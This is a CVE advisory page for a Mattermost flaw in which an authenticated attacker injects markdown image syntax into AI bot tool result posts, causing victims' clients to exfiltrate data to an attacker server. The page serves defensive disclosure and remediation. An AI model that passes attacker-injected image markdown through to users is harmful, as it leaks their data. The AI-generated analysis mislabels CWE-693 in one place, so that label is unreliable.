Description
Mattermost versions 10.11.x <= 10.11.18, 11.6.x <= 11.6.3, 11.5.x <= 11.5.6 fail to properly apply markdown image rendering restrictions to AI bot tool result posts, which allows an authenticated attacker to exfiltrate data to an attacker-controlled server via injecting markdown image syntax into tool result content rendered by a victim's client.. Mattermost Advisory ID: MMSA-2026-00619
Published: 2026-06-26
Score: 3.5 Low
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability lies in certain Mattermost releases that do not enforce markdown image rendering restrictions on AI bot tool result posts. An authenticated attacker can embed malicious image syntax into the bot’s output, causing the victim’s client to request the image from an attacker‑controlled server and thereby exfiltrating the content of the bot response. This presents a data‑exfiltration vector and is classified under CWE‑693, Information Exposure Through Dangerous Defaults.

Affected Systems

Mattermost core version 10.11.x versions 10.11.0‑10.11.18, 11.6.x versions 11.6.0‑11.6.3, and 11.5.x versions 11.5.0‑11.5.6 are affected. The attacker must have a valid authenticated account to exploit the flaw via the AI bot tool within the server.

Risk and Exploitability

The CVSS score of 3.5 indicates a low to moderate severity, and the EPSS is not available. The vulnerability is not listed in CISA KEV. The attack path requires authenticated access to the Mattermost instance and injection of image markdown into a bot result; the victim’s client then makes an outbound HTTP request to an arbitrary host. While the scope is limited to an authenticated user, the data leakage potential exists, making the risk moderate if the environment is not otherwise protected.

Generated by OpenCVE AI on June 26, 2026 at 16:25 UTC.

Remediation

Vendor Solution

Update Mattermost to versions 11.7.0, 10.11.19, 11.6.4, 11.5.7 or higher.

OpenCVE Recommended Actions

  • Upgrade Mattermost to a patched release (10.11.19, 11.6.4, 11.5.7 or later).
  • If an upgrade is unavailable, disable the AI bot tool or block image rendering for bot result messages.
  • Restrict outbound HTTP requests from Mattermost clients to known safe hosts.

Generated by OpenCVE AI on June 26, 2026 at 16:25 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

References
Link Providers
https://mattermost.com/security-updates cve-icon
History

Fri, 26 Jun 2026 19:15:00 +0000

Type Values Removed Values Added
First Time appeared Mattermost
Mattermost mattermost
Vendors & Products Mattermost
Mattermost mattermost

Fri, 26 Jun 2026 16:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 26 Jun 2026 15:15:00 +0000

Type Values Removed Values Added
Description Mattermost versions 10.11.x <= 10.11.18, 11.6.x <= 11.6.3, 11.5.x <= 11.5.6 fail to properly apply markdown image rendering restrictions to AI bot tool result posts, which allows an authenticated attacker to exfiltrate data to an attacker-controlled server via injecting markdown image syntax into tool result content rendered by a victim's client.. Mattermost Advisory ID: MMSA-2026-00619
Title Markdown image rendering bypass in AI bot tool result posts in Mattermost
Weaknesses CWE-693
References
Metrics cvssV3_1

{'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}

Subscriptions

Mattermost Mattermost
cve-icon MITRE

Status: PUBLISHED

Assigner: Mattermost

Published:

Updated: 2026-06-26T15:41:09.780Z

Reserved: 2026-03-03T11:25:53.785Z

Link: CVE-2026-3472

cve-icon Vulnrichment

Updated: 2026-06-26T15:41:06.401Z

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-26T19:00:04Z

Weaknesses
  • CWE-693

    Protection Mechanism Failure